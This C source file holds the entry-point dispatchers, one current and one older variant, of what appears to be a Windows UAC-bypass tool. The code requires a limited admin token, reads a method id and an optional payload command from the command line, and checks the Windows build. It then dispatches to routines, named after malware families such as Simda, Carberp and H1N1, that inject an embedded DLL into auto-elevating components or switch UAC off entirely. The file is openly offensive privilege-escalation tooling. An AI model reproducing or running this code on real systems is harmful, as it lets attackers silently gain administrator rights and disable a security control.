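/*
* ucmMain
*
* Purpose:
*
* Program entry point.
*
* Checks the environment (OS build, token elevation type), reads the method
* id from command line parameter 1 and an optional payload command from
* parameter 2, gates the chosen method on the running build / bitness and
* then calls the method-specific routine.
*
* Return value:
*
* ERROR_INTERNAL_ERROR   - ucmInit failed.
* ERROR_NOT_SUPPORTED    - build older than Windows 7, or the process token is
*                          not a limited (split-token admin) token.
* ERROR_INVALID_ACCESS   - the token elevation type could not be queried.
* ERROR_INVALID_DATA     - no method id on the command line.
* ERROR_UNSUPPORTED_TYPE - method refused for this build / bitness / WOW64, or
*                          the operator answered IDNO to the UACFIX question.
* ERROR_SUCCESS          - otherwise. Note: an unrecognized method id also
*                          returns ERROR_SUCCESS, because neither switch below
*                          has a default branch and nothing is dispatched.
*
*/
UINT ucmMain()
{
    DWORD bytesIO, dwType, paramLen;
    WCHAR *p;
    WCHAR szBuffer[MAX_PATH + 1];
    TOKEN_ELEVATION_TYPE ElevType;

    if (ucmInit() != ERROR_SUCCESS) {
        return ERROR_INTERNAL_ERROR;
    }

    //query windows version
    if (!supIsWindowsVersionOrGreater(HIBYTE(_WIN32_WINNT_WIN7), LOBYTE(_WIN32_WINNT_WIN7), 0)) {
        ucmShowMessage(TEXT("This Windows is unsupported."));
        return ERROR_NOT_SUPPORTED;
    }

    //
    // Precondition: the process must hold the UAC "limited" token of a
    // split-token administrator. A standard user, or a process that is
    // already elevated, is rejected here.
    //
    ElevType = TokenElevationTypeDefault;
    if (!supGetElevationType(&ElevType)) {
        return ERROR_INVALID_ACCESS;
    }

    if (ElevType != TokenElevationTypeLimited) {
        ucmShowMessage(TEXT("Admin account with limited token required."));
        return ERROR_NOT_SUPPORTED;
    }

    //
    // Parameter 1: numeric method id. The buffer holds MAX_PATH characters
    // plus a terminator and MAX_PATH is passed as the copy limit.
    //
    dwType = 0;
    bytesIO = 0;
    RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
    GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO);
    if (bytesIO == 0) {
        return ERROR_INVALID_DATA;
    }

    // single-argument project helper, not the three-argument <stdlib.h> strtoul
    dwType = strtoul(szBuffer);

    //
    // Per-method build gate. When the running build is outside the range a
    // method was written for, the operator is asked (UACFIX prompt) and IDNO
    // aborts. Methods that exist only in 32-bit builds are refused on _WIN64.
    //
    switch (dwType) {

    case METHOD_SYSPREP1://cryptbase
        if (g_ldp.osver.dwBuildNumber > 9200) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case METHOD_SYSPREP2://shcore
        if (g_ldp.osver.dwBuildNumber != 9600) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case METHOD_SYSPREP3://dbgcore
        if (g_ldp.osver.dwBuildNumber != 10240) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case METHOD_OOBE://oobe service
        if (g_ldp.osver.dwBuildNumber >= 10548) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case METHOD_REDIRECTEXE:
        if (g_ldp.osver.dwBuildNumber > 9600) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
#ifdef _WIN64
        ucmShowMessage(WOW64WIN32ONLY);
        return ERROR_UNSUPPORTED_TYPE;
#endif
        break;

    case METHOD_SIMDA:
        if (g_ldp.osver.dwBuildNumber >= 10136) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case METHOD_CARBERP:
        if (g_ldp.osver.dwBuildNumber >= 10147) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case METHOD_CARBERP_EX:
        if (g_ldp.osver.dwBuildNumber >= 10147) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case METHOD_TILON:
        if (g_ldp.osver.dwBuildNumber > 9200) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case METHOD_AVRF:
        if (g_ldp.osver.dwBuildNumber >= 10136) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case METHOD_WINSAT:
        if (g_ldp.osver.dwBuildNumber >= 10548) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case METHOD_SHIMPATCH:
        if (g_ldp.osver.dwBuildNumber > 9600) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
#ifdef _WIN64
        ucmShowMessage(WOW64WIN32ONLY);
        return ERROR_UNSUPPORTED_TYPE;
#endif
        break;

    case METHOD_MMC:
        break;

    case METHOD_H1N1:
        if (g_ldp.osver.dwBuildNumber >= 10548) {
            if (ucmShowQuestion(UACFIX) == IDNO)
                return ERROR_UNSUPPORTED_TYPE;
        }
        break;

    case METHOD_GENERIC:
        break;
    }

    //
    // Parameter 2: optional command for the payload. paramLen is used as a
    // character count (it is scaled by sizeof(WCHAR) for supSetParameter).
    // METHOD_REDIRECTEXE does not go through supSetParameter; the AppCompat
    // branch below receives szBuffer directly instead.
    //
    //prepare command for payload
    paramLen = 0;
    RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
    GetCommandLineParam(GetCommandLine(), 2, szBuffer, MAX_PATH, &paramLen);
    if (paramLen > 0) {
        if (dwType != METHOD_REDIRECTEXE) {
            supSetParameter(szBuffer, paramLen * sizeof(WCHAR));
        }
    }

    //
    // Dispatch. Each branch re-checks WOW64 (for some branches only outside
    // _DEBUG builds) before calling the method routine. The "[UCM] ... called"
    // markers go to OutputDebugString, i.e. they are visible to an attached
    // debugger or a debug-output viewer, not to the user.
    //
    switch (dwType) {

    case METHOD_SYSPREP1:
    case METHOD_SYSPREP2:
    case METHOD_SYSPREP3:
    case METHOD_OOBE:
    case METHOD_TILON:
        //
        // Since we are using injection and not using heavens gate/syswow64, we should ban usage under wow64.
        //
#ifndef _DEBUG
        if (g_ldp.IsWow64) {
            ucmShowMessage(WOW64STRING);
            return ERROR_UNSUPPORTED_TYPE;
        }
#endif
        if (ucmStandardAutoElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
        }
        break;

    //
    // Allow only in 32 version.
    //
#ifndef _WIN64
    case METHOD_REDIRECTEXE:
    case METHOD_SHIMPATCH:
        if (ucmAppcompatElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL),
            (paramLen != 0) ? szBuffer : NULL))
        {
            OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
        }
        break;
#endif

    case METHOD_SIMDA:
        //
        // Since we are using injection and not using heavens gate, we should ban usage under wow64.
        //
#ifndef _DEBUG
        if (g_ldp.IsWow64) {
            ucmShowMessage(WOW64STRING);
            return ERROR_UNSUPPORTED_TYPE;
        }
#endif
        // This method changes a system-wide security setting; it requires an explicit IDYES.
        if (MessageBox(GetDesktopWindow(),
            TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
            PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES)
        {
            if (ucmSimdaTurnOffUac()) {
                OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
            }
        }
        break;

    case METHOD_CARBERP:
    case METHOD_CARBERP_EX:
        if (dwType == METHOD_CARBERP) {
            //there is no migmiz in syswow64 in 8+
            if ((g_ldp.IsWow64) && (g_ldp.osver.dwBuildNumber > 7601)) {
                ucmShowMessage(WOW64STRING);
                return ERROR_UNSUPPORTED_TYPE;
            }
        }
        if (dwType == METHOD_CARBERP_EX) {
#ifndef _DEBUG
            if (g_ldp.IsWow64) {
                ucmShowMessage(WOW64STRING);
                return ERROR_UNSUPPORTED_TYPE;
            }
#endif
        }
        if (ucmWusaMethod(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
        }
        break;

    case METHOD_AVRF:
#ifndef _DEBUG
        if (g_ldp.IsWow64) {
            ucmShowMessage(WOW64STRING);
            return ERROR_UNSUPPORTED_TYPE;
        }
#endif
        if (ucmAvrfMethod((CONST PVOID)AVRFDLL, sizeof(AVRFDLL))) {
            OutputDebugString(TEXT("[UCM] AVrf method called\n\r"));
        }
        break;

    case METHOD_WINSAT:
        //
        // Decoding WOW64 environment, turning wow64fs redirection is meeh. Just drop it as it just a test tool.
        //
        if (g_ldp.IsWow64) {
            ucmShowMessage(LAZYWOW64UNSUPPORTED);
            return ERROR_UNSUPPORTED_TYPE;
        }
        // module name depends on the build; the last argument flags builds up to 10136
        if (g_ldp.osver.dwBuildNumber < 9200) {
            p = L"powrprof.dll";
        }
        else {
            p = L"devobj.dll";
        }
        if (ucmWinSATMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL), (g_ldp.osver.dwBuildNumber <= 10136))) {
            OutputDebugString(TEXT("[UCM] WinSAT method called\n\r"));
        }
        break;

    case METHOD_MMC:
        if (g_ldp.IsWow64) {
            ucmShowMessage(WOW64STRING);
            return ERROR_UNSUPPORTED_TYPE;
        }
        p = L"elsext.dll";
        if (ucmMMCMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] MMC method called\n\r"));
        }
        break;

    case METHOD_H1N1:
        if (g_ldp.IsWow64) {
            ucmShowMessage(WOW64STRING);
            return ERROR_UNSUPPORTED_TYPE;
        }
        if (ucmH1N1Method((CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] H1N1 method called\n\r"));
        }
        break;

    case METHOD_GENERIC:
        if (g_ldp.IsWow64) {
            ucmShowMessage(WOW64STRING);
            return ERROR_UNSUPPORTED_TYPE;
        }
        p = L"ntwdblib.dll";
        if (ucmGenericAutoelevation(METHOD_SQLSRV_TARGETAPP, p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] Generic method called\n\r"));
        }
        break;
    }

    return ERROR_SUCCESS;
}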
/*
* main
*
* Purpose:
*
* Program entry point.
*
* Older variant of the dispatcher: reads the OS build number with
* RtlGetVersion, requires a limited (split-token admin) token, parses the
* method id from command line parameter 1 and dispatches to the method
* routine. Every path ends at the Done label and calls ExitProcess(0), so
* the process exit code never indicates whether a method actually ran.
*
*/
VOID main()
{
    BOOL IsWow64 = FALSE;
    DWORD bytesIO, dwType;
    WCHAR *p;
    WCHAR szBuffer[MAX_PATH + 1];
    TOKEN_ELEVATION_TYPE ElevType;
    RTL_OSVERSIONINFOW osver;

    //verify system version
    RtlSecureZeroMemory(&osver, sizeof(osver));
    osver.dwOSVersionInfoSize = sizeof(osver);
    RtlGetVersion(&osver);
    // builds below 7000 (roughly pre-Windows 7) are refused
    if (osver.dwBuildNumber < 7000) {
        MessageBox(GetDesktopWindow(), TEXT("Unsupported version"), PROGRAMTITLE, MB_ICONINFORMATION);
        goto Done;
    }

    //
    // Precondition: the process must hold the UAC "limited" token of a
    // split-token administrator. A standard user, or a process that is
    // already elevated, exits here. A failed elevation-type query exits
    // silently (no message).
    //
    ElevType = TokenElevationTypeDefault;
    if (!supGetElevationType(&ElevType)) {
        goto Done;
    }

    if (ElevType != TokenElevationTypeLimited) {
        MessageBox(GetDesktopWindow(), TEXT("Admin account with limited token required."), PROGRAMTITLE, MB_ICONINFORMATION);
        goto Done;
    }

    // NOTE(review): a 32-bit process is treated as WOW64 here; whether the
    // helper distinguishes a native 32-bit OS from WOW64 is not visible in this file.
    IsWow64 = supIsProcess32bit(GetCurrentProcess());

    //
    // Parameter 1: numeric method id. Without a parameter dwType stays 0 and
    // neither switch below matches, so the program just exits.
    //
    dwType = 0;
    bytesIO = 0;
    RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
    if (GetCommandLineParam(GetCommandLine(), 1, szBuffer, MAX_PATH, &bytesIO)) {

        // single-argument project helper, not the three-argument <stdlib.h> strtoul
        dwType = strtoul(szBuffer);

        //
        // Per-method build gate: log the selected method to the debugger and
        // refuse methods outside the build range / bitness they were written for.
        //
        switch (dwType) {

        case METHOD_SYSPREP:
            OutputDebugString(TEXT("[UCM] Sysprep\n\r"));
            if (osver.dwBuildNumber > 9200) {
                MessageBox(GetDesktopWindow(), WINPREBLUE, PROGRAMTITLE, MB_ICONINFORMATION);
                goto Done;
            }
            break;

        case METHOD_SYSPREP_EX:
            OutputDebugString(TEXT("[UCM] Sysprep_ex\n\r"));
            if (osver.dwBuildNumber < 9600) {
                MessageBox(GetDesktopWindow(), WINBLUEONLY, PROGRAMTITLE, MB_ICONINFORMATION);
                goto Done;
            }
            break;

        case METHOD_OOBE:
            OutputDebugString(TEXT("[UCM] Oobe\n\r"));
            break;

        case METHOD_REDIRECTEXE:
            OutputDebugString(TEXT("[UCM] AppCompat RedirectEXE\n\r"));
#ifdef _WIN64
            MessageBox(GetDesktopWindow(), WOW64WIN32ONLY, PROGRAMTITLE, MB_ICONINFORMATION);
            goto Done;
#endif
            break;

        case METHOD_SIMDA:
            OutputDebugString(TEXT("[UCM] Simda\n\r"));
            break;

        case METHOD_CARBERP:
            OutputDebugString(TEXT("[UCM] Carberp\n\r"));
            break;

        case METHOD_CARBERP_EX:
            OutputDebugString(TEXT("[UCM] Carberp_ex\n\r"));
            break;

        case METHOD_TILON:
            OutputDebugString(TEXT("[UCM] Tilon\n\r"));
            if (osver.dwBuildNumber > 9200) {
                MessageBox(GetDesktopWindow(), WINPREBLUE, PROGRAMTITLE, MB_ICONINFORMATION);
                goto Done;
            }
            break;

        case METHOD_AVRF:
            OutputDebugString(TEXT("[UCM] AVrf\n\r"));
            break;

        case METHOD_WINSAT:
            OutputDebugString(TEXT("[UCM] WinSAT\n\r"));
            break;

        case METHOD_SHIMPATCH:
            OutputDebugString(TEXT("[UCM] AppCompat Shim Patch\n\r"));
#ifdef _WIN64
            MessageBox(GetDesktopWindow(), WOW64WIN32ONLY, PROGRAMTITLE, MB_ICONINFORMATION);
            goto Done;
#endif
            break;
        }
    }

    //
    // Dispatch. Each branch re-checks WOW64 (for some branches only outside
    // _DEBUG builds) before calling the method routine. The "[UCM] ... called"
    // markers go to OutputDebugString, i.e. they are visible to an attached
    // debugger or a debug-output viewer, not to the user. There is no default
    // branch: an unknown id falls through to Done.
    //
    switch (dwType) {

    case METHOD_SYSPREP:
    case METHOD_SYSPREP_EX:
    case METHOD_OOBE:
    case METHOD_TILON:
        //
        // Since we are using injection and not using heavens gate, we should ban usage under wow64.
        //
#ifndef _DEBUG
        if (IsWow64) {
            MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
            goto Done;
        }
#endif
        if (ucmStandardAutoElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] Standard AutoElevation method called\n\r"));
        }
        break;

    //
    // Allow only in 32 version.
    //
#ifndef _WIN64
    case METHOD_REDIRECTEXE:
    case METHOD_SHIMPATCH:
        if (ucmAppcompatElevation(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] AppCompat method called\n\r"));
        }
        break;
#endif

    case METHOD_SIMDA:
        //
        // Since we are using injection and not using heavens gate, we should ban usage under wow64.
        //
#ifndef _DEBUG
        if (IsWow64) {
            MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
            goto Done;
        }
#endif
        // This method changes a system-wide security setting; it requires an explicit IDYES.
        if (MessageBox(GetDesktopWindow(),
            TEXT("This method will TURN UAC OFF, are you sure? You will need to reenable it after manually."),
            PROGRAMTITLE, MB_ICONQUESTION | MB_YESNO) == IDYES)
        {
            if (ucmSimdaTurnOffUac()) {
                OutputDebugString(TEXT("[UCM] Simda method called\n\r"));
            }
        }
        break;

    case METHOD_CARBERP:
    case METHOD_CARBERP_EX:
        if (dwType == METHOD_CARBERP) {
            if (osver.dwBuildNumber > 9600) {
                MessageBox(GetDesktopWindow(), TEXT("This method is only for Windows 7/8/8.1"), PROGRAMTITLE, MB_ICONINFORMATION);
                goto Done;
            }
            //there is no migmiz in syswow64 in 8+
            if ((IsWow64) && (osver.dwBuildNumber > 7601)) {
                MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
                goto Done;
            }
        }
        if (dwType == METHOD_CARBERP_EX) {
#ifndef _DEBUG
            if (IsWow64) {
                MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
                goto Done;
            }
#endif
        }
        if (ucmWusaMethod(dwType, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] Carberp method called\n\r"));
        }
        break;

    case METHOD_AVRF:
#ifndef _DEBUG
        if (IsWow64) {
            MessageBox(GetDesktopWindow(), WOW64STRING, PROGRAMTITLE, MB_ICONINFORMATION);
            goto Done;
        }
#endif
        if (ucmAvrfMethod((CONST PVOID)AVRFDLL, sizeof(AVRFDLL))) {
            OutputDebugString(TEXT("[UCM] AVrf method called\n\r"));
        }
        break;

    case METHOD_WINSAT:
        //
        // Decoding WOW64 environment, turning wow64fs redirection is meeh. Just drop it as it just a test tool.
        //
        if (IsWow64) {
            MessageBox(GetDesktopWindow(), TEXT("Use 32 bit version of this tool on 32 bit OS version"), PROGRAMTITLE, MB_ICONINFORMATION);
            goto Done;
        }
        // module name depends on the build
        if (osver.dwBuildNumber < 9200) {
            p = L"powrprof.dll";
        }
        else {
            p = L"devobj.dll";
        }
        if (ucmWinSATMethod(p, (CONST PVOID)INJECTDLL, sizeof(INJECTDLL))) {
            OutputDebugString(TEXT("[UCM] WinSAT method called\n\r"));
        }
        break;
    }

Done:
    // unconditional exit with status 0 on every path
    ExitProcess(0);
}